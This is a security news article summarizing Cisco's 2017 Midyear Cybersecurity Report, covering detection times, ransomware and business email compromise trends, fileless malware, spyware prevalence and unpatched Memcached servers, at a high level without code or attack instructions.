Security Experts:

Defenders Gaining on Attackers, But Attacks Becoming More Destructive: Cisco

Cisco Publishes 2017 Midyear Cybersecurity Report

Cisco's just-released Midyear Cybersecurity Report (PDF) draws on the accumulated work of the Cisco Security Research members. The result shows some improvement in industry's security posture, but warns about the accelerating pace of change and sophistication in the global cyber threat landscape.

Improvements can be demonstrated by the mean 'time to detect.' When monitoring first began in November 2015, this stood at 39 hours; but it narrowed to about 3.5 hours in the period from November 2016 to May 2017.

Against this, however, Cisco warns that the pace of technology is creating an ever-increasing threat surface that needs to be protected. "Lack of visibility into dynamic IT environments," notes the report, "the risks presented by "shadow IT," the constant barrage of security alerts, and the complexity of the IT security environment are just some reasons resource-strapped security teams struggle to stay on top of today's evasive and increasingly potent cyber threats."

The report analyzes existing threats, comments on evolving attack methodologies, and makes two worrying predictions about the increasing ruthlessness of attackers. The first prediction is that any apparent current lull in the use of IoT-based large-scale DDoS is no reason for optimism. "Botnet activity in the IoT space suggests some operators may be focused on laying the foundation for a wide-reaching, high-impact attack that could potentially disrupt the Internet itself," says Cisco.

Cisco's second concern is over the potential evolution of ransomware into a threat designed to lock down systems and destroy data as part of the attack process. It calls this threat, Destruction of Service (DeOS); and we may have already seen its nascence in NotPetya .

In financial value to the attacker, Cisco points out that ransomware is far less fruitful than the business email compromise (BEC) attack. "US$5.3 billion was stolen due to BEC fraud between October 2013 and December 2016. In comparison, ransomware exploits took in US$1 billion in 2016," says the report. 

"BEC scams are aimed at big targets," it explains, "and big targets have fallen victim to them, even though such organizations may have mature threat defenses and safeguards against fraud. Both Facebook and Google have been victims of BECs and wire fraud." The attack's success rate is easily explained. "Because BEC messages don't contain malware or suspect links, they can usually bypass all but the most sophisticated threat defense tools."

Cisco highlights five current trends in malware evolution that have been evident in the first six months of 2017. The first is that attackers are using distribution systems that require users to take some type of positive action. An example would be a password-protected malicious document (with the password conveniently provided to the user in the body of the email). "When placed in a sandbox environment," says Cisco "these attachments do not show any evidence of being malicious, so they are forwarded to the user."

The second trend is that ransomware authors are creating malware quickly, easily, and cost-effectively by using open-source codebases, like Hidden Tear and EDA2, which publicly release ransomware code for "educational" purposes.

The third is the continuing growth of ransomware-as-a-service (RaaS) platforms, such as Satan. These, says the report, "are ideal for lazy adversaries who want to enter the ransomware market and launch a successful campaign without having to perform any coding or programming."

"Ransomware as a service," comments David Kennerley, director of threat research at Webroot, "is without a doubt one of the biggest threats facing organizations across industries today, and protection against ransomware is currently a question of economics. Due to poor security practices and culture in many cases it is often seen to be cheaper to pay the ransom to get the data back than to use internal recovery procedures."

But he does not recommend this approach. "No matter how tempting it might be, if any other option exists, however challenging, companies should never negotiate or concede to the criminal and pay the ransom. The danger with paying the ransom is there's no guarantee they'll recover the encrypted files. By paying you are only fueling the ransomware economy – and what now stops you being targeted again in future cyberattacks?"

Cisco's fourth malware trend is the growing prevalence of fileless or memory-resident malware. "It relies on PowerShell or WMI to run the malware completely in memory without writing any artifacts to the file system or registry, unless the attacker wants to put persistent mechanisms in place." Because there is no malware on the disk, there is no file to detect.

The fifth trend is that attackers are relying more on anonymized and decentralized infrastructures for obfuscation in their command and control. Tor bridging services are an example -- such as Tor2web, a proxying service that allows systems on the Internet to access things that are hosted within Tor, without requiring the installation of a local Tor client application.

In most of these developments, there is a constant: the economics of hacking has turned a corner. "The modern hacking community," says the report, "is benefiting from quick and easy access to a range of useful and low-cost resources."

Cisco notes that a decline in the use of exploit kits to deliver malware has coincided with an increase in spam levels. "Adversaries who had relied heavily on exploit kits to deliver ransomware," it explains, "are turning to spam emails, including those containing macro-laden malicious documents that can defeat many sandboxing technologies because they require user interaction to infect systems and deliver payloads."

Cisco does not expect exploit kits to disappear, but "other factors, such as the greater difficulty of exploiting vulnerabilities in files built with Adobe Flash technology, may be slowing the resurgence."

One threat vector given special mention is PUP-style spyware, which is often given little attention by defenders. Cisco studied three common families, and found at least one present within 20% of 300 companies it sampled. The three families are Hola, RelevantKnowledge, and DNSChanger/DNS Unlocker. "Although operators may market spyware as services designed to protect or otherwise help users," warns the report, "the true purpose of the malware is to track and gather information about users and their organizations -- often without users' direct consent or knowledge. Spyware companies are known to sell or provide access to the data they collect, allowing third parties to harvest information with relative anonymity. That information can be used to identify critical assets, map internal infrastructures in organizations, and orchestrate targeted attacks."

Timely patching continues to be an issue. "In late 2016," says the report, "Cisco threat researchers discovered and reported three remote code-execution vulnerabilities in Memcached servers. A scan of the Internet a few months later revealed that 79 percent of the nearly 110,000 exposed Memcached servers previously identified were still vulnerable to the three vulnerabilities because they had not been patched."

The overall picture presented in Cisco's 2017 Midyear Cybersecurity Report is a mixed bag. There is some good news. "Much of the research," it concludes, "shows that defenders not only have been gaining ground on adversaries, but also developing a much better understanding of how and where threat actors operate."

But against this, it adds, attackers are evolving more destructive attacks (such as DeOS and massive scale IoT-based DDoS attacks). "That is why it has never been more important for organizations to make cybersecurity a top priority."

view counter
Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.